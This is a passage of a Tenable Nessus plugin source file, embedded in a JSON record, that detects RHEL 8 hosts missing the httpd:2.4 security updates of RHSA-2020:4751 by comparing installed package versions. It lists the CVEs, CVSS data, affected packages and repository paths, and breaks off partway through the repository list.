"REDHAT-RHSA-2020-4751.NASL", "href": "https://www.tenable.com/plugins/nessus/142397", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4751. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142397);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\n \"CVE-2018-17189\",\n \"CVE-2019-0196\",\n \"CVE-2019-0197\",\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10092\",\n \"CVE-2019-10097\",\n \"CVE-2019-10098\",\n \"CVE-2020-1927\",\n \"CVE-2020-1934\"\n );\n script_bugtraq_id(107669, 107665, 106685);\n script_xref(name:\"IAVA\", value:\"2020-A-0022\");\n script_xref(name:\"IAVA\", value:\"2020-A-0140\");\n script_xref(name:\"IAVA\", value:\"2020-A-0326\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"RHSA\", value:\"2020:4751\");\n script_xref(name:\"IAVA\", value:\"2019-A-0098-S\");\n script_xref(name:\"IAVA\", value:\"2019-A-0033-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0203\");\n\n script_name(english:\"RHEL 8 : httpd:2.4 (RHSA-2020:4751)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:4751 advisory.\n\n - httpd: mod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189)\n\n - httpd: mod_http2: read-after-free on a string compare (CVE-2019-0196)\n\n - httpd: mod_http2: possible crash on late upgrade (CVE-2019-0197)\n\n - httpd: memory corruption on early pushes (CVE-2019-10081)\n\n - httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n - httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n - httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n - httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n - httpd: mod_rewrite configurations vulnerable to open redirect (CVE-2020-1927)\n\n - httpd: mod_proxy_ftp use of uninitialized value (CVE-2020-1934)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2018-17189\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-0196\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-0197\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10081\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10082\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10092\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10097\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10098\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1927\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1934\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4751\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1668497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1695030\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1695042\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743956\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743959\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743966\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743974\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743996\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1820761\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1820772\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79, 120, 400, 416, 444, 456, 601);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_http2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar appstreams = {\n 'httpd:2.4': [\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.4/x86_64/appstream/debug',\n 'content/aus/rhel8/8.4/x86_64/appstream/os',\n 'content/aus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.4/x86_64/baseos/debug',\n 'content/aus/rhel8/8.4/x86_64/baseos/os',\n 'content/aus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/aarch64/appstream/debug',\n 'content/e4s/rhel8/8.4/aarch64/appstream/os',\n 'content/e4s/rhel8/8.4/aarch64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/aarch64/baseos/debug',\n 'content/e4s/rhel8/8.4/aarch64/baseos/os',\n 'content/e4s/rhel8/8.4/aarch64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/appstream/debug',\n 'content/e4s/rhel8/8.4/ppc64le/appstream/os',\n 'content/e4s/rhel8/8.4/ppc64le/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/baseos/debug',\n 'content/e4s/rhel8/8.4/ppc64le/baseos/os',\n 'content/e4s/rhel8/8.4/ppc64le/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/highavailability/debug',\n 'content/e4s/rhel8/8.4/ppc64le/highavailability/os',\n 'content/e4s/rhel8/8.4/ppc64le/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/sap-solutions/debug',\n 'content/e4s/rhel8/8.4/ppc64le/sap-solutions/os',\n 'content/e4s/rhel8/8.4/ppc64le/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/sap/debug',\n 'content/e4s/rhel8/8.4/ppc64le/sap/os',\n 'content/e4s/rhel8/8.4/ppc64le/sap/source/SRPMS',\n 'content/e4s/rhel8/8.4/s390x/appstream/debug',\n 'content/e4s/rhel8/8.4/s390x/appstream/os',\n 'content/e4s/rhel8/8.4/s390x/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/s390x/baseos/debug',\n 'content/e4s/rhel8/8.4/s390x/baseos/os',\n 'content/e4s/rhel8/8.4/s390x/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.4/x86_64/appstream/os',\n 'content/e4s/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.4/x86_64/baseos/os',\n 'content/e4s/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/nfv/debug',\n 'content/e4s/rhel8/8.4/x86_64/nfv/os',\n 'content/e4s/rhel8/8.4/x86_64/nfv/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/sap/debug',\n 'content/e4s/rhel8/8.4/x86_64/sap/os',\n 'content/e4s/rhel8/8.4/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/appstream/debug',\n 'content/eus/rhel8/8.4/aarch64/appstream/os',\n 'content/eus/rhel8/8.4/aarch64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/baseos/debug',\n 'content/eus/rhel8/8.4/aarch64/baseos/os',\n 'content/eus/rhel8/8.4/aarch64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/codeready-builder/debug',\n 'content/eus/rhel8/8.4/aarch64/codeready-builder/os',\n 'content/eus/rhel8/8.4/aarch64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/highavailability/debug',\n 'content/eus/rhel8/8.4/aarch64/highavailability/os',\n 'content/eus/rhel8/8.4/aarch64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/supplementary/debug',\n 'content/eus/rhel8/8.4/aarch64/supplementary/os',\n 'content/eus/rhel8/8.4/aarch64/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/appstream/debug',\n 'content/eus/rhel8/8.4/ppc64le/appstream/os',\n 'content/eus/rhel8/8.4/ppc64le/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/baseos/debug',\n 'content/eus/rhel8/8.4/ppc64le/baseos/os',\n 'content/eus/rhel8/8.4/ppc64le/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/codeready-builder/debug',\n 'content/eus/rhel8/8.4/ppc64le/codeready-builder/os',\n 'content/eus/rhel8/8.4/ppc64le/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/highavailability/debug',\n 'content/eus/rhel8/8.4/ppc64le/highavailability/os',\n 'content/eus/rhel8/8.4/ppc64le/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/resilientstorage/debug',\n 'content/eus/rhel8/8.4/ppc64le/resilientstorage/os',\n 'content/eus/rhel8/8.4/ppc64le/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/sap-solutions/debug',\n 'content/eus/rhel8/8.4/ppc64le/sap-solutions/os',\n 'content/eus/rhel8/8.4/ppc64le/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/sap/debug',\n 'content/eus/rhel8/8.4/ppc64le/sap/os',\n 'content/eus/rhel8/8.4/ppc64le/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/supplementary/debug',\n 'content/eus/rhel8/8.4/ppc64le/supplementary/os',\n 'content/eus/rhel8/8.4/ppc64le/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/appstream/debug',\n 'content/eus/rhel8/8.4/s390x/appstream/os',\n 'content/eus/rhel8/8.4/s390x/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/baseos/debug',\n 'content/eus/rhel8/8.4/s390x/baseos/os',\n 'content/eus/rhel8/8.4/s390x/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/codeready-builder/debug',\n 'content/eus/rhel8/8.4/s390x/codeready-builder/os',\n 'content/eus/rhel8/8.4/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/highavailability/debug',\n 'content/eus/rhel8/8.4/s390x/highavailability/os',\n 'content/eus/rhel8/8.4/s390x/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/resilientstorage/debug',\n 'content/eus/rhel8/8.4/s390x/resilientstorage/os',\n 'content/eus/rhel8/8.4/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/sap/debug',\n 'content/eus/rhel8/8.4/s390x/sap/os',\n 'content/eus/rhel8/8.4/s390x/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/supplementary/debug',\n 'content/eus/rhel8/8.4/s390x/supplementary/os',\n 'content/eus/rhel8/8.4/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/appstream/debug',\n 'content/eus/rhel8/8.4/x86_64/appstream/os',\n 'content/eus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/baseos/debug',\n 'content/eus/rhel8/8.4/x86_64/baseos/os',\n 'content/eus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.4/x86_64/highavailability/os',\n 'content/eus/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/sap/debug',\n 'content/eus/rhel8/8.4/x86_64/sap/os',\n 'content/eus/rhel8/8.4/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.4/x86_64/supplementary/os',\n 'content/eus/rhel8/8.4/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/appstream/debug',\n 'content/tus/rhel8/8.4/x86_64/appstream/os',\n 'content/tus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/baseos/debug',\n 'content/tus/rhel8/8.4/x86_64/baseos/os',\n 'content/tus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.4/x86_64/highavailability/os',\n 'content/tus/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/nfv/debug',\n 'content/tus/rhel8/8.4/x86_64/nfv/os',\n 'content/tus/rhel8/8.4/x86_64/nfv/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/rt/debug',\n 'content/tus/rhel8/8.4/x86_64/rt/os',\n 'content/tus/rhel8/8.4/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-filesystem-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-manual-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_http2-1.15.7-2.module+el8.3.0+7670+8bf57d29', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_proxy_html-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_session-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'4', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.6/x86_64/appstream/debug',\n 'content/aus/rhel8/8.6/x86_64/appstream/os',\n 'content/aus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.6/x86_64/baseos/debug',\n 'content/aus/rhel8/8.6/x86_64/baseos/os',\n 'content/aus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/appstream/debug',\n 'content/e4s/rhel8/8.6/ppc64le/appstream/os',\n 'content/e4s/rhel8/8.6/ppc64le/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/baseos/debug',\n 'content/e4s/rhel8/8.6/ppc64le/baseos/os',\n 'content/e4s/rhel8/8.6/ppc64le/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/highavailability/debug',\n 'content/e4s/rhel8/8.6/ppc64le/highavailability/os',\n 'content/e4s/rhel8/8.6/ppc64le/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/sap-solutions/debug',\n 'content/e4s/rhel8/8.6/ppc64le/sap-solutions/os',\n 'content/e4s/rhel8/8.6/ppc64le/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/sap/debug',\n 'content/e4s/rhel8/8.6/ppc64le/sap/os',\n 'content/e4s/rhel8/8.6/ppc64le/sap/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.6/x86_64/appstream/os',\n 'content/e4s/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.6/x86_64/baseos/os',\n 'content/e4s/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/sap/debug',\n 'content/e4s/rhel8/8.6/x86_64/sap/os',\n 'content/e4s/rhel8/8.6/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/aarch64/appstream/debug',\n 'content/eus/rhel8/8.6/aarch64/appstream/os',\n 'content/eus/rhel8/8.6/aarch64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/aarch64/baseos/debug',\n 'content/eus/rhel8/8.6/aarch64/baseos/os',\n 'content/eus/rhel8/8.6/aarch64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/aarch64/codeready-builder/debug',\n 'content/eus/rhel8/8.6/aarch64/codeready-builder/os',\n 'content/eus/rhel8/8.6/aarch64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.6/aarch64/highavailability/debug',\n 'content/eus/rhel8/8.6/aarch64/highavailability/os',\n 'content/eus/rhel8/8.6/aarch64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/aarch64/supplementary/debug',\n 'content/eus/rhel8/8.6/aarch64/supplementary/os',\n 'content/eus/rhel8/8.6/aarch64/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/appstream/debug',\n 'content/eus/rhel8/8.6/ppc64le/appstream/os',\n 'content/eus/rhel8/8.6/ppc64le/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/baseos/debug',\n 'content/eus/rhel8/8.6/ppc64le/baseos/os',\n 'content/eus/rhel8/8.6/ppc64le/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/codeready-builder/debug',\n 'content/eus/rhel8/8.6/ppc64le/codeready-builder/os',\n 'content/eus/rhel8/8.6/ppc64le/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/highavailability/debug',\n 'content/eus/rhel8/8.6/ppc64le/highavailability/os',\n 'content/eus/rhel8/8.6/ppc64le/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/resilientstorage/debug',\n 'content/eus/rhel8/8.6/ppc64le/resilientstorage/os',\n 'content/eus/rhel8/8.6/ppc64le/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/sap-solutions/debug',\n 'content/eus/rhel8/8.6/ppc64le/sap-solutions/os',\n 'content/eus/rhel8/8.6/ppc64le/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/sap/debug',\n 'content/eus/rhel8/8.6/ppc64le/sap/os',\n 'content/eus/rhel8/8.6/ppc64le/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/supplementary/debug',\n 'content/eus/rhel8/8.6/ppc64le/supplementary/os',\n 'content/eus/rhel8/8.6/ppc64le/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/appstream/debug',\n 'content/eus/rhel8/8.6/s390x/appstream/os',\n 'content/eus/rhel8/8.6/s390x/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/baseos/debug',\n 'content/eus/rhel8/8.6/s390x/baseos/os',\n 'content/eus/rhel8/8.6/s390x/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/codeready-builder/debug',\n 'content/eus/rhel8/8.6/s390x/codeready-builder/os',\n 'content/eus/rhel8/8.6/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/highavailability/debug',\n 'content/eus/rhel8/8.6/s390x/highavailability/os',\n 'content/eus/rhel8/8.6/s390x/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/resilientstorage/debug',\n 'content/eus/rhel8/8.6/s390x/resilientstorage/os',\n 'content/eus/rhel8/8.6/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/sap/debug',\n 'content/eus/rhel8/8.6/s390x/sap/os',\n 'content/eus/rhel8/8.6/s390x/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/supplementary/debug',\n 'content/eus/rhel8/8.6/s390x/supplementary/os',\n 'content/eus/rhel8/8.6/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/appstream/debug',\n 'content/eus/rhel8/8.6/x86_64/appstream/os',\n 'content/eus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/baseos/debug',\n 'content/eus/rhel8/8.6/x86_64/baseos/os',\n 'content/eus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.6/x86_64/highavailability/os',\n 'content/eus/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/sap/debug',\n 'content/eus/rhel8/8.6/x86_64/sap/os',\n 'content/eus/rhel8/8.6/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.6/x86_64/supplementary/os',\n 'content/eus/rhel8/8.6/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/appstream/debug',\n 'content/tus/rhel8/8.6/x86_64/appstream/os',\n 'content/tus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/baseos/debug',\n 'content/tus/rhel8/8.6/x86_64/baseos/os',\n 'content/tus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.6/x86_64/highavailability/os',\n 'content/tus/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/rt/os',\n 'content/tus/rhel8/8.6/x86_64/rt/source/SRPMS'\n ],\n 